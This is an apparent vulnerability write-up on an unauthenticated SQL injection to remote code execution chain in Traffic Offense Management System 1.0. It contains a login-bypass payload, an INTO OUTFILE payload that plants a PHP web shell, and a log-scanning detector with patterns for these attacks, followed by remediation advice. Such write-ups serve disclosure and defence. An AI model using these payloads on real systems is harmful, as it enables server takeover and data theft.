Traffic Offense Management System 1.0 - SQLi to Remote Code Execution (RCE) (Unauthenticated)

Exploit / Project Details

Python Wed Aug 18 2021

Zero-Day Discovery & Exploit Development: Traffic Offense Management System

Detailed Write-up

Introduction

In this report, we will examine a critical Remote Code Execution (RCE) vulnerability discovered in the "Traffic Offense Management System 1.0". This vulnerability allows an unauthenticated attacker to completely compromise the server. The attack chain begins with an SQL Injection to bypass the authentication mechanism, followed by another SQL Injection (INTO OUTFILE) to write a malicious PHP file to the server.

Vulnerability Analysis

Phase 1: Authentication Bypass (SQL Injection)

The first step of the attack is to gain access to the administration panel. The application's login mechanism is located in classes/Login.php.

// classes/Login.php
$qry = $this->conn->query("SELECT * from users where username = '$username' and password = md5('$password') ");

As seen, the $username variable is directly included in the SQL query. This is a classic SQL Injection vulnerability.

Payload Used: admin' or '1'='1'#

When this payload is sent, the query becomes:

SELECT * from users where username = 'admin' or '1'='1'#' and password = md5('...')

Because the # comments out the rest of the query (including the password check) and '1'='1' is always true, the WHERE clause matches regardless of the password, so the attacker is logged in as the administrator without knowing it.

Phase 2: Path Disclosure

To write a file, we need to know the absolute path on the server. The id parameter in admin/drivers/manage_driver.php is also vulnerable to SQL injection.

// admin/drivers/manage_driver.php
$qry = $conn->query("SELECT * from `drivers_list` where id = '{$_GET['id']}' ");

If a single quote (') is sent in the id parameter, the SQL syntax breaks and, because error display is enabled, PHP returns a Warning message that contains the absolute path of the script on the server.

Phase 3: Remote Code Execution (SQL Injection - INTO OUTFILE)

Once the path is known, we can use the same SQL injection point (admin/drivers/manage_driver.php) to write a file to the server. MySQL's INTO OUTFILE feature is used to write query results to a file.

Payload Used:

' LIMIT 0,1 INTO OUTFILE '/var/www/html/admin/shell.php' LINES TERMINATED BY 0x3c3f7068702073797374656d28245f4745545b27636d64275d293b203f3e -- -

This payload writes the query result (or rather, the PHP code specified by LINES TERMINATED BY) to the specified path on the server. The hex-encoded part corresponds to <?php system($_GET['cmd']); ?>.

Exploit Development

The developed Python script (50244.py) automates the following steps:

  1. Login Bypass: Logs in by sending an SQLi payload to classes/Login.php.
  2. Driver ID Detection: Scrapes admin/?page=drivers to find a valid driver ID. This ID is required for the subsequent SQL injection.
  3. Path Detection: Sends a malformed ID to the manage_driver page and parses the returned error message to find the server's full path.
  4. Shell Upload: Uses the INTO OUTFILE technique to write a PHP file with a random name to the detected path.
  5. Command Execution: Sends a request to the uploaded PHP file to execute the whoami command and prints the result.
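As an added defender-side example that is not part of the original write-up or of the exploit script: a small Python detector that scans web-server access logs for the footprints of phases 2 and 3 (a quote in the manage_driver.php id parameter, INTO OUTFILE / LINES TERMINATED BY, the hex-encoded PHP tag, and a later request to a PHP file under admin/ with a cmd parameter) and reports sources that completed the whole chain. The log lines, IP addresses and the file name x.php are constructed for this example.

```python
import re
from urllib.parse import unquote_plus

# Constructed Apache-style access-log sample (not from the original write-up):
# 10.0.0.5 mimics the exploit script's request sequence, 10.0.0.9 is benign traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [18/Aug/2021:10:01:02 +0000] "POST /classes/Login.php?f=login HTTP/1.1" 200 45
10.0.0.5 - - [18/Aug/2021:10:01:03 +0000] "GET /admin/?page=drivers HTTP/1.1" 200 5120
10.0.0.5 - - [18/Aug/2021:10:01:04 +0000] "GET /admin/drivers/manage_driver.php?id=1%27 HTTP/1.1" 200 800
10.0.0.5 - - [18/Aug/2021:10:01:05 +0000] "GET /admin/drivers/manage_driver.php?id=%27%20LIMIT%200,1%20INTO%20OUTFILE%20%27/var/www/html/admin/x.php%27%20LINES%20TERMINATED%20BY%200x3c3f706870 HTTP/1.1" 200 0
10.0.0.5 - - [18/Aug/2021:10:01:06 +0000] "GET /admin/x.php?cmd=whoami HTTP/1.1" 200 9
10.0.0.9 - - [18/Aug/2021:10:02:00 +0000] "GET /admin/drivers/manage_driver.php?id=3 HTTP/1.1" 200 800
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Footprints of the attack phases, matched against the URL-decoded path + query string.
RULES = {
    "sqli_error_probe": re.compile(r"manage_driver\.php\?id=[^&]*'", re.I),   # phase 2: quote in id
    "sqli_into_outfile": re.compile(r"\binto\s+outfile\b|\blines\s+terminated\s+by\b", re.I),
    "sqli_hex_php_tag": re.compile(r"0x3c3f706870", re.I),                  # hex of '<?php'
    "webshell_cmd_param": re.compile(r"/admin/[^/?]+\.php\?(?:[^&]*&)*cmd=", re.I),  # phase 3 follow-up
}

def parse_line(line):
    """Parse one log line; returns a dict with a URL-decoded 'decoded' path, or None."""
    m = LOG_RE.match(line)
    return None if m is None else dict(m.groupdict(), decoded=unquote_plus(m["path"]))

def match_rules(decoded_path):
    return [name for name, rx in RULES.items() if rx.search(decoded_path)]

def analyze(log_text):
    """Return (alerts, per_ip): alerts = [(ip, rule, decoded path)], per_ip = {ip: set(rules)}."""
    alerts, per_ip = [], {}
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        for rule in match_rules(rec["decoded"]):
            alerts.append((rec["ip"], rule, rec["decoded"]))
            per_ip.setdefault(rec["ip"], set()).add(rule)
    return alerts, per_ip

def completed_chains(per_ip):
    """IPs that injected into the id parameter and then invoked a PHP file with cmd=."""
    sqli = {"sqli_error_probe", "sqli_into_outfile", "sqli_hex_php_tag"}
    return sorted(ip for ip, r in per_ip.items() if r & sqli and "webshell_cmd_param" in r)
```

Running analyze(SAMPLE_LOG) yields five alerts, all from 10.0.0.5, and completed_chains() reports that address alone; the POST to classes/Login.php leaves no query-string footprint, so the phase 1 bypass must be caught at the application layer (e.g. by logging failed parameter validation) rather than from access logs.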

Remediation

To fix these vulnerabilities:

  1. Prepared Statements: Parameterized queries must be used in all database queries.

    Vulnerable:

    $qry = $this->conn->query("SELECT * from users where username = '$username' and password = md5('$password') ");

    Secure:

    // mysqli prepared statement: the ? placeholders are bound as data, so user input can never alter the SQL structure
    $stmt = $this->conn->prepare("SELECT * from users where username = ? and password = md5(?)");
    $stmt->bind_param("ss", $username, $password);
    $stmt->execute();
    $qry = $stmt->get_result();

  2. Disable Error Display: display_errors should be turned off in production systems.

  3. Database Privileges: The FILE privilege (file read/write) should be revoked from the database user.

2024 © Tağmaç Han